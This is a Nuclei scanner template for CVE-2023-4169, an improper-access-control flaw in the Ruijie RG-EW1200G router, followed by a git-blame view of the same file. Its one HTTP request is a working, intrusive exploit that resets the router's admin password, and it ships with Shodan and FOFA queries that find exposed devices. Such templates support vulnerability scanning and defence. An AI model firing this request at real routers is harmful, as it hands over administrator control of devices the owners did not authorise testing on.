nuclei-templates/http/cves/2023/CVE-2023-4169.yaml

id: CVE-2023-4169

info:
  name: Ruijie RG-EW1200G Router - Password Reset
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4169
    - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G
    - https://vuldb.com/?ctiid.236185
    - https://vuldb.com/?id.236185
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-4169
    cwe-id: CWE-284,NVD-CWE-noinfo
    epss-score: 0.0131
    epss-percentile: 0.85907
    cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ruijie
    product: rg-ew1200g_firmware
    shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
    fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
  tags: cve,cve2023,ruijie,router,intrusive
variables:
  password: "{{rand_base(8)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/sys/set_passwd"

    body: |
      {
      "username":"web",
      "admin_new":"{{password}}"
      }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"ok"'

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a004730450220368b98f36f09a638be30332a8c9e763dc3dc9c8ecf4fdb4d48262bfb0ee79d58022100dccc7a915cb6d0eb0970460c74652810244da8e1ffeaca8ef9f4cd1871990bbe:922c64590222798bb761d5b6d8e72950
Update and rename CVE-2023-4415.yaml to CVE-2023-4169.yaml 2023-10-31 08:31:23 +00:00			`id: CVE-2023-4169`
Create CVE-2023-4415.yaml 2023-10-31 08:19:08 +00:00
			`info:`
			`name: Ruijie RG-EW1200G Router - Password Reset`
			`author: DhiyaneshDK`
			`severity: high`
			`description: \|`
			`A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-4169`
			`- https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G`
TemplateMan Update [Thu Nov 2 07:14:22 UTC 2023] :robot: 2023-11-02 07:14:22 +00:00			`- https://vuldb.com/?ctiid.236185`
			`- https://vuldb.com/?id.236185`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/20142995/sectool`
TemplateMan Update [Thu Nov 2 07:14:22 UTC 2023] :robot: 2023-11-02 07:14:22 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.8`
			`cve-id: CVE-2023-4169`
TemplateMan Update [Sun Nov 5 22:23:39 UTC 2023] :robot: 2023-11-05 22:23:39 +00:00			`cwe-id: CWE-284,NVD-CWE-noinfo`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.0131`
			`epss-percentile: 0.85907`
TemplateMan Update [Thu Nov 2 07:14:22 UTC 2023] :robot: 2023-11-02 07:14:22 +00:00			`cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:::::::*`
Create CVE-2023-4415.yaml 2023-10-31 08:19:08 +00:00			`metadata:`
			`max-request: 1`
TemplateMan Update [Thu Nov 2 07:14:22 UTC 2023] :robot: 2023-11-02 07:14:22 +00:00			`vendor: ruijie`
Create CVE-2023-4415.yaml 2023-10-31 08:19:08 +00:00			`product: rg-ew1200g_firmware`
product/queries updated 2024-05-31 19:23:20 +00:00			`shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"`
TemplateMan Update [Thu Nov 2 07:14:22 UTC 2023] :robot: 2023-11-02 07:14:22 +00:00			`fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"`
Update CVE-2023-4169.yaml 2023-11-02 06:47:30 +00:00			`tags: cve,cve2023,ruijie,router,intrusive`
Update CVE-2023-4169.yaml 2023-11-02 06:58:15 +00:00			`variables:`
			`password: "{{rand_base(8)}}"`

Create CVE-2023-4415.yaml 2023-10-31 08:19:08 +00:00			`http:`
			`- method: POST`
			`path:`
			`- "{{BaseURL}}/api/sys/set_passwd"`
TemplateMan Update [Thu Nov 2 07:14:22 UTC 2023] :robot: 2023-11-02 07:14:22 +00:00
Create CVE-2023-4415.yaml 2023-10-31 08:19:08 +00:00			`body: \|`
TemplateMan Update [Thu Nov 2 07:14:22 UTC 2023] :robot: 2023-11-02 07:14:22 +00:00			`{`
			`"username":"web",`
			`"admin_new":"{{password}}"`
			`}`
Create CVE-2023-4415.yaml 2023-10-31 08:19:08 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '"result":"ok"'`

			`- type: word`
			`part: header`
			`words:`
			`- application/json`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a004730450220368b98f36f09a638be30332a8c9e763dc3dc9c8ecf4fdb4d48262bfb0ee79d58022100dccc7a915cb6d0eb0970460c74652810244da8e1ffeaca8ef9f4cd1871990bbe:922c64590222798bb761d5b6d8e72950`